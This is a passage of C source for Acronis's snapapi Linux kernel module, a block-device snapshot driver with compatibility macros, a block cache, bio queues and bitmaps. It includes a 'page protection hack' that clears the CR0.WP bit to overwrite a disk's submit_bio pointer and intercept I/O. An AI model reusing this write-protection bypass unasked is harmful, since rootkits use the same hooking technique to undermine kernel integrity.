/* snapapi.c
   Copyright (C) Acronis, 2004
   Written by Vladimir Simonov
   $Id: snapapi26.c 1262030 2018-01-11 12:33:11Z marina $
*/
#include "kernel_config.h"
#ifdef HAVE_LINUX_CONFIG
#include <linux/config.h>
#elif defined(HAVE_LINUX_AUTOCONF)
#include <linux/autoconf.h>
#elif defined(HAVE_GENERATED_AUTOCONF)
#include <generated/autoconf.h>
#else
#warning "neither linux/config.h nor linux/autoconf.h or generated/autoconf.h found"
#endif
#ifdef HAVE_SCHED_SIGNAL_H
#include <linux/sched/signal.h>
#endif
#ifdef HAVE_BLK_CGROUP_H
#include <linux/blk-cgroup.h>
#endif
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/kernel.h>
#include <linux/version.h>
#include <linux/errno.h>
#include <linux/string.h>
#include <linux/file.h>
#include <linux/kthread.h>
#include <asm/div64.h>

#include <linux/fs.h>

#include <linux/init.h>

#if LINUX_VERSION_CODE < KERNEL_VERSION(3,4,0)
#include <asm/system.h>
#endif
#include <asm/uaccess.h>
#include <asm/bitops.h>
#include <linux/mm.h>
#include <linux/highmem.h>
#include <linux/slab.h>
#include <linux/smp.h>

#include <linux/bio.h>
#include <linux/blkdev.h>
#include <linux/buffer_head.h>
#include <linux/interrupt.h> /* for in_interrupt */
#include <linux/poll.h>
#include <linux/timer.h>
#ifdef HAVE_IOCTL32_CONVERSIONS
#include <linux/ioctl32.h>
#endif
#ifdef HAVE_FREEZER_H
#include <linux/freezer.h>
#endif
#if defined(CONFIG_VZ_VZSNAP) || defined(CONFIG_VZ_VZSNAP_MODULE)
#define USE_VZ_VZSNAP
#include <linux/vzsnap.h>
#endif
#ifdef HAVE_PART_STAT_H
#include <linux/part_stat.h>
#endif
#ifdef HAVE_BLK_MQ_MAKE_REQUEST
#include <linux/blk-mq.h>
#endif

#include "snapapi.h"

#define DEBUG		0

#define DEBUG_API	(1 << 1)
#define DEBUG_ALLOC	(1 << 2)
#define DEBUG_BIO	(1 << 3)
#define DEBUG_BIOQUE	(1 << 4)
#define DEBUG_CACHE	(1 << 5)
#define DEBUG_BREAD	(1 << 6)
#define DEBUG_INTERNALS	(1 << 7)
#define DEBUG_DUMP	(1 << 8)
#define DEBUG_LOCK	(1 << 9)
#define DEBUG_IOCTL	(1 << 10)
#define DEBUG_MESS	(1 << 11)
#define DEBUG_BMAP	(1 << 12)

#define DEBUG_LEVEL 	(DEBUG_API)

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,23)
#define sn_request_queue request_queue_t
#define sn_kmem_cache kmem_cache_t
#else
#define sn_request_queue struct request_queue
#define sn_kmem_cache struct kmem_cache
#endif

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,24)
#define sn_bio_io_error(x) bio_io_error(x, sn_bio_bi_size(x))
#define BIO_EIO_RET_VAL_ERR 1
#define BIO_EIO_RET_VAL_OK 0
#else
#define sn_bio_io_error(x) bio_io_error(x)
#define BIO_EIO_RET_VAL_ERR
#define BIO_EIO_RET_VAL_OK
#endif
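/*
 * On kernels >= 2.6.24 the bio end_io callback returns void, so the
 * BIO_EIO_RET_VAL_* macros expand to nothing there and a statement like
 * "return BIO_EIO_RET_VAL_OK;" becomes a bare "return;".
 */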

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,7)
#define USE_KERNEL_THREAD
#endif

#ifdef HAVE_KMAP_ATOMIC_2ARGS
#define sn_kmap_atomic(a) kmap_atomic(a, KM_USER0)
#define sn_kunmap_atomic(a) kunmap_atomic(a, KM_USER0)
#else
#define sn_kmap_atomic(a) kmap_atomic(a)
#define sn_kunmap_atomic(a) kunmap_atomic(a)
#endif

#ifdef HAVE_ASM_HAVE_SET_MB
#define sn_set_mb set_mb
#else
#define sn_set_mb smp_store_mb
#endif

#ifdef HAVE_VM_FAULT_2ARGS
#define snapapi_vm_fault(a, b) snapapi_vm_fault(a, b)
#else
#define snapapi_vm_fault(a, b) snapapi_vm_fault(b)
#endif

#ifdef HAVE_SYNC_BLOCKDEV
#define sn_fsync_bdev sync_blockdev
#else
#define sn_fsync_bdev fsync_bdev
#endif


#ifdef HAVE_VMFAULT_T
#define VMFAULT_RETURN_VALUE vm_fault_t
#else
#define VMFAULT_RETURN_VALUE int
#endif

#ifndef HAVE_REQ_WRITE
#define REQ_WRITE	(1 << BIO_RW)
#endif

#ifndef HAVE_FMODE_T
typedef unsigned int fmode_t;
#endif

#if DEBUG
#define inline
#define sa_debug(level, fmt, arg...)					\
	do {								\
		static const char *func = __FUNCTION__;			\
		if ((level) & DEBUG_LEVEL)				\
			printk(KERN_DEBUG "%s(%s,%d): " fmt, func,	\
				current->comm, current->pid, ##arg);	\
	} while (0)
#else
#define sa_debug(level, fmt, arg...) do { } while (0)
#endif

#define sa_kdebug(fmt, arg...)					\
	do {							\
		static const char *func = __FUNCTION__;		\
		printk(KERN_DEBUG "%s(%s,%d): " fmt, func,	\
			current->comm, current->pid, ##arg);	\
	} while (0)
#define sa_info(fmt, arg...)					\
	do {							\
		static const char *func = __FUNCTION__;		\
		printk(KERN_INFO "%s(%s,%d): " fmt, func,	\
			current->comm, current->pid, ##arg);	\
	} while (0)
#define sa_warn(fmt, arg...)					\
	do {							\
		static const char *func = __FUNCTION__;		\
		printk(KERN_WARNING "%s(%s,%d): " fmt, func,	\
			current->comm, current->pid, ##arg);	\
	} while (0)
#define sa_error(fmt, arg...)					\
	do {							\
		static const char *func = __FUNCTION__;		\
		printk(KERN_ERR "%s(%s,%d): " fmt, func,	\
			current->comm, current->pid, ##arg);	\
	} while (0)

#define sa_BUG(fmt, arg...)					\
	do {							\
		static const char *func = __FUNCTION__;		\
		printk(KERN_CRIT "%s(%s,%d): " fmt, func,	\
			current->comm, current->pid, ##arg);	\
		BUG();						\
	} while (0)

#if defined(__x86_64) && defined(HAVE_IOCTL32_H) && defined(CONFIG_COMPAT) && !defined(HAVE_COMPAT_IOCTL)
#define HAVE_IOCTL32_CONVERSION
#endif

#ifdef HAVE_BD_SUPER
#define sn_get_super(bdev) (bdev)->bd_super
#define sn_drop_super(sb)
#elif defined(HAVE_BD_HOLDER)
#define sn_get_super(bdev) ((bdev)->bd_holder_ops ? (bdev)->bd_holder : 0)
#define sn_drop_super(sb)
#else
#define sn_get_super(bdev) get_super(bdev)
#define sn_drop_super(sb) drop_super(sb)
#endif

#if defined (HAVE_BDOPS_SUBMIT_BIO_BLK_QC_T) || defined(HAVE_BDOPS_SUBMIT_BIO_VOID)
#define HAVE_BDOPS_SUBMIT_BIO 1
#endif

#ifdef HAVE_BDOPS_SUBMIT_BIO
#include <linux/utsname.h>
#include <generated/utsrelease.h>
#define generic_make_request submit_bio_noacct
#ifdef HAVE_BDOPS_SUBMIT_BIO_VOID
#define MAKE_REQUEST_RETURN_VALUE void
#define MAKE_REQUEST_EXIT_STATUS
#else
#define MAKE_REQUEST_RETURN_VALUE blk_qc_t
#define MAKE_REQUEST_EXIT_STATUS 0
#endif
typedef MAKE_REQUEST_RETURN_VALUE (make_request_fn) (struct bio *bio);
#if defined(CONFIG_X86)
// page protection hack
#ifndef X86_CR0_WP
#define X86_CR0_WP (1UL << 16)
#endif
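/*
 * CR0.WP=1 makes supervisor-mode writes honor read-only page table
 * entries.  Temporarily clearing it lets us patch the (const, hence
 * write-protected) block_device_operations below.  CR0 is per-CPU
 * state, which is why the caller disables preemption around the write.
 */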
static inline void wp_cr0(unsigned long cr0)
{
	__asm__ __volatile__ ("mov %0, %%cr0": "+r"(cr0));
}

static inline unsigned long disable_page_protection(void )
{
	unsigned long cr0;
	cr0 = read_cr0();
	wp_cr0(cr0 & ~X86_CR0_WP);
	return cr0;
}

static inline void reenable_page_protection(unsigned long cr0)
{
	wp_cr0(cr0);
}

static inline void snapapi_set_submit_bio_fn(struct block_device *bdev, make_request_fn *fn)
{
	unsigned long cr0;

	preempt_disable();
	cr0 = disable_page_protection();
	sa_debug(DEBUG_API, " Replacing original fops->submit_bio %p for disk %s", bdev->bd_disk->fops->submit_bio, bdev->bd_disk->disk_name);
	((struct block_device_operations *)bdev->bd_disk->fops)->submit_bio = fn;
	sa_debug(DEBUG_API, "with new  %p\n", bdev->bd_disk->fops->submit_bio);
	reenable_page_protection(cr0);
	preempt_enable();
}

#else
#pragma message("Page protection unimplemented for current architecture")
#endif
#endif

#ifndef HAVE_BDOPS_SUBMIT_BIO
#ifdef HAVE_MAKE_REQUEST_INT
#define MAKE_REQUEST_EXIT_STATUS 0
#define MAKE_REQUEST_RETURN_VALUE int
#elif defined(HAVE_MAKE_REQUEST_BLK_QC_T)
#define MAKE_REQUEST_EXIT_STATUS 0
#define MAKE_REQUEST_RETURN_VALUE blk_qc_t
#else
#define MAKE_REQUEST_EXIT_STATUS
#define MAKE_REQUEST_RETURN_VALUE void
#endif
#endif

#ifdef HAVE_BLKDEV_PUT_INT
#define MAKE_BLKDEV_RETURN_VALUE int
#else
#define MAKE_BLKDEV_RETURN_VALUE void
#endif

#ifndef HAVE_PAGE_CACHE_RELEASE
#define page_cache_release(page) put_page(page)
#endif

static int snap_init_ok;
static int snapctl_major;
static int snap_emergency_size;
static struct vm_operations_struct snapctl_vm_ops;

static wait_queue_head_t select_wait;
static int messages_pos;
#define MESSAGE_SIZE (sizeof(struct snap_message))
#define MAX_MESSAGES (PAGE_SIZE / MESSAGE_SIZE)
struct snap_message *messages_buf;
static struct semaphore messages_sem = __SEMAPHORE_INITIALIZER(messages_sem, 1);

#ifndef USE_KERNEL_THREAD
static struct task_struct *resolver_thread;
#else
#include <linux/smp_lock.h>
static pid_t resolver_thread_pid;
static wait_queue_head_t resolver_thread_signal;
#endif

static int resolver_thread_continue = 1;
static DECLARE_COMPLETION(resolver_thread_exited);

static LIST_HEAD(sessions_list);
static LIST_HEAD(notinited_list);

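/* round a up to a whole number of b-sized units (ceiling division) */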
#define sn_round(a,b) (((a) + (b) - 1) / (b))

/* sessions_list, notinited_list and pid_info_p protection */
#ifdef HAVE_SPIN_LOCK_UNLOCKED
static spinlock_t sessions_lock = SPIN_LOCK_UNLOCKED;
#else
static DEFINE_SPINLOCK(sessions_lock);
#endif
static atomic_t slab_uid = ATOMIC_INIT(0);

#define REFS_PER_PAGE	(PAGE_SIZE / (sizeof(void *)))
#define REFS_PER_PAGE_MASK (~(REFS_PER_PAGE - 1))
#if BITS_PER_LONG == 32
#define REFS_PER_PAGE_SHIFT (PAGE_SHIFT - 2)
#elif BITS_PER_LONG == 64
#define REFS_PER_PAGE_SHIFT (PAGE_SHIFT - 3)
#else
#error Unsupported architecture detected
#endif

#define MAX_BHPAGES	REFS_PER_PAGE
#define MAX_BH_DELAYED	(REFS_PER_PAGE * MAX_BHPAGES)
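/*
 * Worked example (x86_64, 4 KiB pages): REFS_PER_PAGE = 4096/8 = 512,
 * REFS_PER_PAGE_SHIFT = 12 - 3 = 9, so one page of pointers covers 512
 * pages and MAX_BH_DELAYED = 512 * 512 = 262144 delayed bios.
 */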

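/*
 * Two-level bitmap: blkmap[] holds pointers to "meta" pages, each of
 * which holds REFS_PER_PAGE pointers to bitmap pages; every bitmap page
 * covers PAGE_SIZE * 8 block numbers.  With 4 KiB pages one meta page
 * therefore spans 512 * 32768 = 16M blocks.
 */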
struct block_map {
	unsigned long long	size; /* size in bits of allocated memory */
	unsigned long long	rsize; /* size in bits of real data */
	struct page **		blkmap;
};

#ifdef __GFP_HIGHIO
#define GFP_SNAPHIGH	(__GFP_IO | __GFP_HIGHIO | __GFP_FS | __GFP_HIGHMEM)
#else
#define GFP_SNAPHIGH	(__GFP_IO | __GFP_FS | __GFP_HIGHMEM)
#endif
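/*
 * Cache entry describing one page of saved blocks.  The objects come
 * from a kmem cache that is oversized when bppage > 1 (see
 * sn_get_blkcache_ctor()), so 'bno' is really the first element of a
 * bppage-long array of block numbers; ~0ULL marks a free slot.
 */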
struct sa_page {
	struct sa_page *	next;
	struct page *		page;
	unsigned long long	bno;
};

struct sa_chain {
	struct sa_page *	busy;
	struct sa_page *	free;
	spinlock_t		lock;
#define FAKE_READ	1
#define READ_KERNEL1	2
#define READ_KERNEL2	3
};

#ifndef BIO_MAX_PAGES
#define BIO_MAX_PAGES 256
#endif
#define MAX_MMPAGES 64
#define MAX_RDPAGES BIO_MAX_PAGES
#define MEM_ALLOC_TM 5	/* memory allocation timeout ms */
#define TIMER_INTERVAL (5*HZ)
#define IOCTL_SIM_INTERVAL (1*HZ) /* ioctl simulate interval */

struct bio_req {
	struct bio *bio;
	struct completion event;
};

struct pending_request;
struct pending_queue {
	spinlock_t		pq_lock;
	struct pending_request	*pq_req;	/* pending request list head */
	struct pending_request	*pq_reqtail;	/* pending request list tail */
	int			pq_state;
	struct completion	pq_done;
	struct completion	pq_bio_done;	/* end_io signal */
	atomic_t		pq_ready_req;	/* number of ready requests */
	atomic_t		pq_notready_req;
};

enum pending_queue_states {
	PQ_STOPPED,	/* There are no unhandled pending requests */
	PQ_RUNNING,	/* New requests may be pushed to queue */
	PQ_CLOSED,	/* New requests can't be pushed to queue, but old
			 * requests may still be unfinished */
};

struct pending_read_request {
	/*
	 * While the rbio is being handled it may be remapped; this results
	 * in losing information about the initial request, so we have to
	 * explicitly save the rbio block number.
	 */
	unsigned long long	rblkno;	/* first rbio block */
	struct bio		*rbio;	/* bio to read */
};

struct pending_request {
	struct pending_request 	*pr_next;	/* pending requests list */
	struct bio		*pr_wbio;	/* original delayed bio */
	struct pending_queue	*pr_queue;	/* session delayed queue */
	int			pr_count;	/* read bios requests count */
	int			pr_ready;	/* ready count */
	struct pending_read_request	pr_bios[1]; /* bios to read */
};
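/*
 * Lifecycle sketch: a delayed write bio (pr_wbio) waits until all of its
 * pr_count read bios have completed.  sa_pending_bio_end_io() bumps
 * pr_ready for each finished rbio and, once pr_ready == pr_count, moves
 * the request onto the queue's ready list for process-context handling.
 */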

struct level_entry {
	unsigned long long max_key;
	struct page* page;
};

struct stack_entry {
	struct page* page;
	struct level_entry* entry;
	unsigned long long max_key;
};

struct group_map {
	unsigned level;
	struct page* root;
	unsigned long long max_key;
	struct stack_entry stack[8];
};

struct sn_pid_info {
	pid_t sn_pid; 		/* pid */
	atomic_t sn_refs; 	/* reference count */
	atomic_t sn_ioctls;	/* ioctls counter */
};

#define MAX_PID_INFO (PAGE_SIZE / sizeof(struct sn_pid_info))
/* pid_info_p entries are protected by sessions_lock */
static struct sn_pid_info* pid_info_p;

/* 64 pages - ~11000 chains, memory size 256 Kb */
#define BLK_CHAINS_PAGES 64

struct session_struct {
	struct list_head	s_list;
	dev_t			s_kdev;
	struct block_device *	s_bdev;
	void*			s_bdev_container;
	volatile unsigned int	s_state;
	unsigned int		s_bppage;	/* blocks per page */
	unsigned int		s_bsize;	/* block size */
	unsigned int		s_spb;		/* secs per block */
	unsigned int		s_spbshift;	/* secs per block shift */
	unsigned long long	s_plen;
	unsigned long long	s_pstart;
	struct super_block *	s_sb;

	unsigned long long	s_fblock;	/* EXTxx: first data block */
	unsigned long		s_gcount;	/* group count */
	unsigned int		s_bpgroup;	/* blocks per group */

	atomic_t		s_users;
	struct block_map	s_blkmap;
#ifdef CATCH_ILLEGAL_ACCESS
	struct block_map	s_blkmap_backup;
#endif
	struct group_map	s_groupmap;
	int			s_usemap;
	unsigned long long 	s_bmsize;

#ifdef USE_VZ_VZSNAP
	struct vzsnap_struct *	s_vzs;
#endif

	int 			s_mess_pos;	/* last read message */
	spinlock_t		s_misc_lock;	/* protects from here to */
						/* s_make_request_fn */
	int			s_ioctlcnt;	/* state data */
	int			s_ioctlcnt_prev;
	struct sn_pid_info *	s_pid_info;	/* pid owning the session */
	unsigned long		s_simulate_tm;	/* next time to simulate ioctl */
	int			s_heartbeat_active;
	struct timer_list 	s_timer;	/* heartbeat in frozen */

	make_request_fn *	s_make_request_fn; /* original fn from queue */
	int			s_queue_mq_based; /* 1 if queue is mq-based (requests should be dispatched via blk_mq_make_request)*/
	sn_request_queue *	s_request_queue;

	spinlock_t		s_biolist_lock;
	struct bio ***		s_bioarr;
	int			s_biopages;
	int			s_biocount;

	struct vm_area_struct *	s_vma;
	atomic_t		s_vma_users;
	int			s_msize;	/* vm area pages */
	int			s_maxmsize;	/* max vm area pages */
	struct page *		s_mpages[MAX_MMPAGES];	/* mmapped pages */
	struct bio_req *	s_local_bios;	/* space exchange */
	unsigned long long	s_ahead_bno;	/* start ahead buffer */
	unsigned int		s_asize;

	struct semaphore        s_sem;		/* user space requests
						   serialization */
	struct pending_queue	s_pending_queue;/* pending request queue used
						   by async handler */

	sn_kmem_cache *		s_blkcachep;
	char			s_blkcachename[64];
	int 			s_blkcache_pages;
	spinlock_t		s_blkcache_emlock;
	int	 		s_blkcache_empages;
	int	 		s_blkcache_emmin;
	struct sa_page *	s_blk_emlist;
	int			s_veid;
	int			s_simulate_freeze;	/* disable freeze */
	int			s_anyblk_chain;		/* first chain to be searched by next any_block_in_cache() */

	spinlock_t		s_stat_lock;	/* protects from here to s_abios */
	const char*		pref_gpages;
	const char*		pref_ppages;
	unsigned long long	s_gpages;	/* got pages */
	unsigned long long	s_ppages;	/* put pages */
	unsigned long long	s_abios;	/* allocated bios */
	unsigned long long	s_fbios;	/* freed bios */
	unsigned long long	s_dbios;	/* delayed bios */
	unsigned long long	s_rblocks;	/* read blocks */
	unsigned long long	s_cblocks;	/* cached blocks */
	unsigned long long	s_rcblocks;	/* read from cache */
	unsigned long long	s_fcblocks;	/* freed cache  blocks */
	unsigned long long	s_mcblocks;	/* max blocks in cache */
	unsigned long long	s_rwcolls;	/* read/write collisions */
	unsigned long long	s_rc2blocks;	/* read to cache2 blocks */
	unsigned int s_sync_req;		/* sync requests  */
	unsigned int s_mipr;		/* max increase pending requests */
	unsigned int s_async_req;	/* async requests  */
	unsigned int s_iprcnt;		/* increase pending requests count */
	unsigned int s_async_retr;	/* async retries */
	unsigned int s_mbio;  		/* min bio size */
	unsigned long long s_rccalls;	/* total number of searches in blkcache (sa_cache_chain_read calls) */
	unsigned long long s_maxrcdepth;	/* length of the deepest search in single blkcache chain */
	unsigned long long s_rcdepthcnt[4];	/* total counts of blkcache searches with depth > SNAP_RCDEPTHi */

	struct page*		s_blkchains_pages[BLK_CHAINS_PAGES];
};

static inline void inc_get_pages(struct session_struct* s)
{
	spin_lock(&s->s_stat_lock);
	s->s_gpages++;
	spin_unlock(&s->s_stat_lock);
}

static inline unsigned long long read_get_pages(struct session_struct* s)
{
	unsigned long long ret;
	spin_lock(&s->s_stat_lock);
	ret = s->s_gpages;
	spin_unlock(&s->s_stat_lock);
	return ret;
}

static inline void inc_put_pages(struct session_struct* s)
{
	spin_lock(&s->s_stat_lock);
	s->s_ppages++;
	spin_unlock(&s->s_stat_lock);
}

static inline unsigned long long read_put_pages(struct session_struct* s)
{
	unsigned long long ret;
	spin_lock(&s->s_stat_lock);
	ret = s->s_ppages;
	spin_unlock(&s->s_stat_lock);
	return ret;
}

#define BLK_CHAINS_PER_PAGE (PAGE_SIZE / sizeof(struct sa_chain))
#define BLK_CHAINS (BLK_CHAINS_PAGES * BLK_CHAINS_PER_PAGE)

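/*
 * Note: do_div(n, base) divides n in place and returns the remainder,
 * so both helpers below effectively hash a block number as
 * bno % BLK_CHAINS to pick a cache chain.
 */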
static inline int sa_get_blk_chain_index(unsigned long long num)
{
	int ret = do_div(num, (unsigned)BLK_CHAINS);

	return ret;
}

static inline struct sa_chain* sa_get_blk_chain(struct session_struct* s, unsigned long long num)
{
	unsigned index;
	unsigned page_no;
	unsigned no_on_page;
	struct sa_chain* chain;

	index = do_div(num, (unsigned)BLK_CHAINS);
	no_on_page = index % (unsigned)BLK_CHAINS_PER_PAGE;
	page_no = index / (unsigned)BLK_CHAINS_PER_PAGE;
	chain = (struct sa_chain*) page_address(s->s_blkchains_pages[page_no]);

	return &chain[no_on_page];
}

static noinline void sa_blkchains_destroy(struct session_struct *s)
{
	int i;

	for (i = 0; i < BLK_CHAINS_PAGES; i++) {
		struct page * page;
		page = s->s_blkchains_pages[i];
		if (page) {
			page_cache_release(page);
			inc_put_pages(s);
			s->s_blkchains_pages[i] = NULL;
		}
	}
}

static noinline int sa_blkchains_init(struct session_struct *s)
{
	struct page *pg;
	int ret, i;

	ret = -ENOMEM;
	for (i = 0; i < BLK_CHAINS_PAGES; i++) {
		int j;
		struct sa_chain* chain;

		pg = alloc_page(GFP_KERNEL);
		if (unlikely(!pg)) {
			goto out;
		}

		inc_get_pages(s);
		chain = (struct sa_chain*) page_address(pg);
		memset(chain, 0, PAGE_SIZE);

		for (j = 0; j < BLK_CHAINS_PER_PAGE; j++, chain++)
			spin_lock_init(&chain->lock);

		s->s_blkchains_pages[i] = pg;
	}

	ret = 0;

out:
	return ret;
}

static inline sector_t sn_bio_bi_sector(struct bio *bio)
{
#ifdef HAVE_BVEC_ITER
	return bio->bi_iter.bi_sector;
#else
	return bio->bi_sector;
#endif
}

static inline unsigned int sn_bio_bi_size(struct bio *bio)
{
#ifdef HAVE_BVEC_ITER
	return bio->bi_iter.bi_size;
#else
	return bio->bi_size;
#endif
}

static void destroy_cached_bio(struct session_struct* s, struct bio *bio);
static void noinline destroy_pending_request(struct session_struct *s,
					struct pending_request *preq)
{
	int i;

	if (!preq)
		return;

	for (i = 0; i < preq->pr_count; i++) {
		if (preq->pr_bios[i].rbio)
			destroy_cached_bio(s, preq->pr_bios[i].rbio);
	}
	kfree(preq);
}

#define snapapi_get_dev_queue(s) bdev_get_queue(s->s_bdev)
#define snapapi_lock_dev_queue(q) do { \
		if (q->queue_lock) \
			spin_lock_irq(q->queue_lock); \
	} while (0)
#define snapapi_unlock_dev_queue(q) do { \
		if (q->queue_lock) \
			spin_unlock_irq(q->queue_lock); \
		} while (0)


struct locked_dev {
	struct block_device *bdev;
	void *bdev_container;
	dev_t dev;
	unsigned lock_type;
	struct session_struct *sess;
};

#define MAX_LOCKEDDEVS (PAGE_SIZE / sizeof(struct locked_dev))
static int lockedcnt; /* global lock/unlock devs */
static struct locked_dev * devlocked;
/* devlocked & lockedcnt protection */
static struct semaphore devlocked_sem = __SEMAPHORE_INITIALIZER(devlocked_sem, 1);

static void unregister_make_request(struct session_struct * s);
static void mpages_destroy(struct session_struct *s);
static void close_session(struct session_struct *s, int do_free);
#if 0
static void dump_sessions(void);
#endif

#ifdef HAVE_TRY_TO_FREEZE_NO_ARGS
#define snapapi_try_to_freeze() try_to_freeze()
#elif defined(HAVE_TRY_TO_FREEZE_ONE_ARG)
#define snapapi_try_to_freeze() try_to_freeze(PF_FREEZE)
#else
#define snapapi_try_to_freeze()
#endif

#if !defined(HAVE_FREEZE_BDEV) && !defined(HAVE_BDEV_FREEZE)
static struct super_block *freeze_bdev(struct block_device *bdev)
{
	struct super_block *sb;

	sb = sn_get_super(bdev);
	if (sb) {
		if (sb->s_op->write_super_lockfs)
			sb->s_op->write_super_lockfs(sb);
	}
	sync_blockdev(bdev);
	return sb;
}

static void thaw_bdev(struct block_device *bdev, struct super_block *sb)
{
	if (sb) {
		if (sb->s_op->unlockfs)
			sb->s_op->unlockfs(sb);
		sn_drop_super(sb);
	}
}
#endif

static void sn_freeze_bdev(struct session_struct *s)
{
	if (!s->s_simulate_freeze) {
#ifdef HAVE_FREEZE_BDEV_INT
		int ret = 0;
		ret = freeze_bdev(s->s_bdev);
		if (ret) {
			sa_warn("freeze_bdev error");
		}
		s->s_sb = s->s_bdev->bd_fsfreeze_sb;
#elif defined(HAVE_BDEV_FREEZE)
		int ret = 0;
		ret = bdev_freeze(s->s_bdev);
		if (ret) {
			sa_warn("bdev_freeze error");
		}
		s->s_sb = sn_get_super(s->s_bdev);
#else
		s->s_sb = freeze_bdev(s->s_bdev);
#endif
	} else {
		sn_fsync_bdev(s->s_bdev);
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,15)
		s->s_sb = sn_get_super(s->s_bdev);
#else
		s->s_sb = user_get_super(s->s_kdev);
#endif
	}
}

static void sn_thaw_bdev(struct session_struct *s)
{
	if (!s->s_simulate_freeze) {
#ifdef HAVE_THAW_BDEV_2ARGS
		thaw_bdev(s->s_bdev, s->s_sb);
#elif defined(HAVE_BDEV_FREEZE)
		bdev_thaw(s->s_bdev);
#else
		thaw_bdev(s->s_bdev);
#endif
	} else {
		if (s->s_sb)
			sn_drop_super(s->s_sb);
	}
	s->s_sb = NULL;
}

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,23)
typedef void* (*sn_blkcache_ctor_t)(void*);

static void *sn_blkcache_ctor_1bppage(void *mem)
{
	return memset(mem, 0, sizeof(struct sa_page));
}

static void *sn_blkcache_ctor_2bppage(void *mem)
{
	return memset(mem, 0, sizeof(struct sa_page) + sizeof(unsigned long long) * 1);
}

static void *sn_blkcache_ctor_4bppage(void *mem)
{
	return memset(mem, 0, sizeof(struct sa_page) + sizeof(unsigned long long) * 3);
}

static sn_blkcache_ctor_t sn_get_blkcache_ctor(unsigned int bppage)
{
	switch (bppage) {
		case 1:
			return sn_blkcache_ctor_1bppage;
		case 2:
			return sn_blkcache_ctor_2bppage;
		case 4:
			return sn_blkcache_ctor_4bppage;
	}
	return NULL;
}
#endif

static int sn_is_error_bio(struct bio *bio)
{
#ifdef HAVE_BIO_UPTODATE
	return !test_bit(BIO_UPTODATE, &bio->bi_flags);
#elif defined(HAVE_BIO_BI_ERROR)
	return bio->bi_error;
#else
	return bio->bi_status;
#endif
}

static void sn_submit_bio(int rw, struct bio *bio)
{
#ifdef HAVE_SUBMIT_BIO_ONEARG
#ifdef HAVE_BIO_SET_OP_ATTRS
	bio_set_op_attrs(bio, rw, 0);
#else
	bio->bi_opf = rw;
#endif
	submit_bio(bio);
#else
	submit_bio(rw, bio);
#endif
}

static int sn_op_is_write(struct bio *bio)
{
#ifndef HAVE_OP_IS_WRITE
	return bio->bi_rw & REQ_WRITE;
#else
	return op_is_write(bio_op(bio));
#endif
}

#ifdef HAVE_BDOPS_SUBMIT_BIO
static sn_request_queue* sn_bio_queue(struct bio *bio)
{
#ifndef HAVE_BIO_BI_BDEV
	return bio->bi_disk->queue;
#else
	return bio->bi_bdev->bd_disk->queue;
#endif
}
#endif

/*
 * Add request to back of pending list
 */
static void pqueue_add_request(struct pending_queue *pq,
			struct pending_request *preq)
{
	if (pq->pq_reqtail) {
		pq->pq_reqtail->pr_next = preq;
		pq->pq_reqtail = preq;
	} else
		pq->pq_req = pq->pq_reqtail = preq;
}

/*
 * Grab first pending request
 */
static struct pending_request *pqueue_get_request(struct pending_queue *pq)
{
	struct pending_request *preq = pq->pq_req;
	if (preq) {
		if (preq == pq->pq_reqtail)
			pq->pq_reqtail = NULL;
		pq->pq_req = preq->pr_next;
		preq->pr_next = NULL;
	}
	return preq;
}

static inline int blkmap_release_pages(struct session_struct *s,
		struct page **page_ptr)
{
	unsigned int count;
	unsigned int i;

	for (i = 0, count = 0; i < REFS_PER_PAGE; i++, page_ptr++) {
		struct page *page;

		page = *page_ptr;
		if (unlikely(!page))
			continue;
		page_cache_release(page);
		inc_put_pages(s);
		count++;
	}
	return count;
}

static void do_block_map_destroy(struct session_struct *s,
				struct block_map *bmap)
{
	unsigned long long bsize;
	unsigned int pages, mpages;
	struct page *page;
	unsigned int i;

	if (!bmap->blkmap)
		return;
	bsize = sn_round(bmap->size, 8);
	pages = sn_round(bsize, PAGE_SIZE);
	/* pages with pointers to pages */
	mpages = sn_round(pages, REFS_PER_PAGE);

	for (i = 0; i < mpages; i++) {
		page = bmap->blkmap[i];
		if (unlikely(!page))
			break;
		sa_debug(DEBUG_BMAP, "s=%p, mpage(%u,%p,%p)\n",
					s, i, page, page_address(page));
		blkmap_release_pages(s, page_address(page));
		page_cache_release(page);
		inc_put_pages(s);
	}
	kfree(bmap->blkmap);
	bmap->blkmap = NULL;
	bmap->size = 0;
	bmap->rsize = 0;
	return;
}

static void noinline block_map_destroy(struct session_struct *s)
{
	do_block_map_destroy(s, &s->s_blkmap);
#ifdef CATCH_ILLEGAL_ACCESS
	do_block_map_destroy(s, &s->s_blkmap_backup);
#endif
	return;
}

static inline unsigned int blkmap_high_pages(struct session_struct * s,
		struct page **page_ptr, unsigned n)
{
	struct page *p;
	unsigned int count;

	for (count = 0; count < n; page_ptr++, count++) {
		p = alloc_page(GFP_HIGHUSER);
		if (unlikely(!p))
			return count;

		inc_get_pages(s);
		*page_ptr = p;
	}
	return count;
}

static int blkmap_alloc_pages(struct session_struct * s, struct page **blkmap,
					unsigned pages)
{
	struct page *p;
	unsigned int i, count, hpages;

	for (i = 0; i < pages; i += REFS_PER_PAGE, blkmap++) {
		p = alloc_page(GFP_KERNEL);
		if (unlikely(!p))
			goto out_free;
		memset(page_address(p), 0, PAGE_SIZE);
		*blkmap = p;
		sa_debug(DEBUG_BMAP, "s=%p, mpage(%u,%p,%p)\n",
			s, i, p, page_address(p));
		inc_get_pages(s);
		hpages = (i + REFS_PER_PAGE < pages) ? REFS_PER_PAGE :
							pages - i;
		count = blkmap_high_pages(s, page_address(p), hpages);
		if (count != hpages)
			goto out_free;
	}
	return 0;

out_free:
	block_map_destroy(s);
	return -ENOMEM;
}

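/*
 * Index math: the top bits of pageno select the meta page, the low
 * REFS_PER_PAGE_SHIFT bits select the slot.  E.g. with 4 KiB pages,
 * pageno 1000 resolves to blkmap[1], slot 488 (1000 >> 9 == 1,
 * 1000 & 511 == 488).
 */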
static inline struct page * blkmap_page(struct page **blkmap,
				unsigned int pageno)
{
	struct page **mpage;

	mpage = page_address(blkmap[pageno >> REFS_PER_PAGE_SHIFT]);
	return mpage[pageno & (~REFS_PER_PAGE_MASK)];
}

static void blkmap_page_release(struct page **blkmap, unsigned int pageno)
{
	struct page **mpage;
	struct page *page;
	unsigned int idx;

	mpage = page_address(blkmap[pageno >> REFS_PER_PAGE_SHIFT]);
